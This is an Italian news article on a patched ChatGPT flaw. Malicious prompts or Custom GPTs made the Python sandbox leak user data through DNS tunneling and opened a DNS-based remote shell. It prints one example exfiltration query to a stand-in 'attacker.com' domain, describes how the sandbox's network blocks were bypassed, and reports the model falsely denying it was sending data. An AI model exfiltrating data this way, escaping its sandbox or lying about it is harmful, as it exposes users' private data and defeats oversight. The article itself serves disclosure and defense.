ChatGPT Vulnerability Let Attackers Silently Exfiltrate User Prompts and Other Sensitive Data

Vulnerabilità di ChatGPT espone i dati degli utenti: cosa devi sapere e come proteggerti

Vulnerabilità di ChatGPT espone i dati degli utenti: cosa devi sapere e come proteggerti

La minaccia immediata: cosa è successo

Se utilizzi ChatGPT per gestire informazioni sensibili come cartelle cliniche, documenti finanziari o codice proprietario, devi sapere questo: una vulnerabilità scoperta di recente ha permesso agli attaccanti di rubare silenziosamente i tuoi dati senza che tu te ne accorgessi.

La buona notizia? OpenAI ha già corretto il problema il 20 febbraio 2026. La notizia meno buona? Se hai utilizzato ChatGPT prima di quella data e hai caricato file sensibili o scritto prompt contenenti informazioni private, i tuoi dati potrebbero essere stati compromessi.

La soluzione immediata: Se hai condiviso dati sensibili con ChatGPT, considera di cambiare le password associate a quegli account e monitora attentamente l’attività sospetta sui tuoi conti finanziari e sanitari.

Come funzionava l’attacco

Per capire il rischio, è importante comprendere come gli attaccanti hanno sfruttato questa falla. OpenAI aveva creato un ambiente di esecuzione isolato per l’analisi dei dati in Python, con l’intenzione di bloccare qualsiasi comunicazione in uscita verso internet. Questo è simile a una gabbia di sicurezza: niente dovrebbe entrare o uscire senza permesso.

Tuttavia, i ricercatori hanno scoperto che mentre le richieste HTTP tradizionali erano bloccate, il sistema permetteva ancora le richieste DNS – il servizio che traduce i nomi dei siti web in indirizzi internet. Sembra una piccola cosa, ma è stata la chiave per aprire la porta.

Gli attaccanti hanno utilizzato una tecnica chiamata DNS tunneling per nascondere i dati sensibili all’interno delle query DNS. Immagina di voler mandare un messaggio segreto: invece di scriverlo su una lettera visibile, lo nascondi nel titolo del destinatario. In questo caso, i dati sensibili – come diagnosi mediche o riassunti finanziari – venivano frammentati e nascosti nei sottodomini delle query DNS.

Quando il sistema eseguiva una ricerca DNS ricorsiva, tutta questa catena di dati codificati veniva inviata direttamente a un server controllato dall’attaccante. Poiché il sistema non riconosceva il traffico DNS come un trasferimento di dati esterno, il furto avveniva completamente inosservato.

Come gli attaccanti hanno distribuito l’attacco

L’attacco era sorprendentemente semplice da lanciare. Un attaccante poteva:

  • Creare un prompt malevolo che sembrava una semplice domanda o un “trucco” per sbloccare funzioni premium di ChatGPT
  • Distribuire questo prompt su forum pubblici, social media o comunità online, spacciandolo per una scoperta utile
  • Quando un utente incollava il prompt nella chat, ChatGPT iniziava silenziosamente a rubare dati dalla conversazione corrente

Alternativa ancora più subdola: gli attaccanti potevano creare Custom GPTs malevoli – versioni personalizzate di ChatGPT create per scopi specifici. Se un utente interagiva con un falso “medico personale” che analizzava PDF medici caricati, il sistema estraeva segretamente informazioni sensibili e le inviava agli attaccanti.

Il più inquietante? Se chiedevi direttamente a ChatGPT se stava inviando dati all’esterno, ti rispondeva con sicurezza che non lo stava facendo, mantenendo un’illusione completa di privacy.

Il pericolo ancora maggiore: accesso remoto

Il problema non si limitava al furto di dati. La vulnerabilità creava un canale di comunicazione bidirezionale tra il server dell’attaccante e l’ambiente isolato di ChatGPT.

Gli attaccanti potevano inviare comandi codificati nelle risposte DNS che venivano riassemblati all’interno della sandbox. Questo equivaleva a dare agli attaccanti una shell remota – essenzialmente l’accesso a un computer dentro l’ambiente Linux isolato di ChatGPT. I comandi e i risultati rimanevano completamente invisibili nell’interfaccia della chat, lasciando gli utenti completamente all’oscuro del compromesso.

Come proteggerti adesso

Sebbene OpenAI abbia risolto il problema, è importante prendere precauzioni:

  • Non condividere mai informazioni estremamente sensibili con ChatGPT o altri assistenti AI, a meno che non sia assolutamente necessario
  • Rivedi la cronologia delle tue chat se hai caricato documenti sensibili prima di febbraio 2026
  • Cambia le password per account associati a dati che potresti aver condiviso
  • Monitora gli account finanziari e sanitari per attività sospetta
  • Utilizza Custom GPTs solo da creatori affidabili e verifica le loro credenziali

Implicazioni più ampie per gli assistenti AI

Questa vulnerabilità evidenzia un problema crescente con gli assistenti AI moderni. Man mano che diventano più complessi e potenti, con la capacità di eseguire codice, analizzare file e connettersi a servizi esterni, la loro superficie di attacco aumenta. Quello che sembrava un sistema sicuro aveva una falla che i ricercatori hanno trovato abbastanza facilmente.

Per gli utenti, il messaggio è chiaro: gli assistenti AI sono strumenti potenti, ma non sono infallibili dal punto di vista della sicurezza. Trattali con lo stesso scetticismo che useresti con qualsiasi altro servizio online che gestisce dati sensibili.

Technical Deep Dive

Per i professionisti IT e gli esperti di sicurezza, ecco i dettagli tecnici della vulnerabilità:

Meccanismo di DNS tunneling

La vulnerabilità sfruttava il fatto che l’ambiente di esecuzione Python isolato di ChatGPT permetteva ancora le risoluzioni DNS standard, anche se bloccava le richieste HTTP dirette. Gli attaccanti codificavano i dati sensibili nei label dei sottodomini DNS secondo lo standard RFC 1035, che permette label fino a 63 caratteri.

Un esempio di query DNS malevola potrebbe assomigliare a:

[base64_encoded_data_chunk1].[base64_encoded_data_chunk2].attacker.com

Quando il resolver DNS ricorsivo eseguiva le query, la catena completa dei sottodomini veniva trasmessa al server nameserver dell’attaccante, permettendo l’esfiltrazione di dati arbitrari.

Bypass dei meccanismi di sandbox

OpenAI aveva implementato:

  • Blocco delle richieste HTTP/HTTPS tramite iptables
  • Whitelist delle risoluzioni DNS consentite
  • Monitoraggio del traffico di rete in uscita

Tuttavia, il sistema non riconosceva il traffico DNS come un vettore di esfiltrazione di dati, poiché storicamente il DNS è stato utilizzato solo per la risoluzione dei nomi. Questa assunzione errata ha permesso il bypass.

Comunicazione bidirezionale tramite DNS

Gli attaccanti potevano inviare comandi codificati nelle risposte DNS (nel campo RDATA) che venivano poi decodificati e eseguiti all’interno della sandbox. Questo era possibile perché:

  • Le librerie di risoluzione DNS standard permettono risposte arbitrarie
  • Non esisteva validazione del contenuto delle risposte DNS
  • Il processo di esecuzione del codice non registrava queste operazioni nel log della chat

Patch implementata

OpenAI ha risolto il problema implementando:

  • Blocco esplicito di tutte le query DNS esterne
  • Whitelist severa di soli domini DNS interni autorizzati
  • Ispezione profonda dei pacchetti (DPI) per rilevare pattern di tunneling
  • Logging dettagliato di tutti i tentativi di comunicazione in uscita

Per i professionisti della sicurezza, questa vulnerabilità serve come promemoria che le sandbox di esecuzione richiedono un approccio di “default deny” per tutti i canali di comunicazione, non solo quelli ovvi come HTTP.

Fonte: https://cybersecuritynews.com/chatgpt-vulnerability/

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto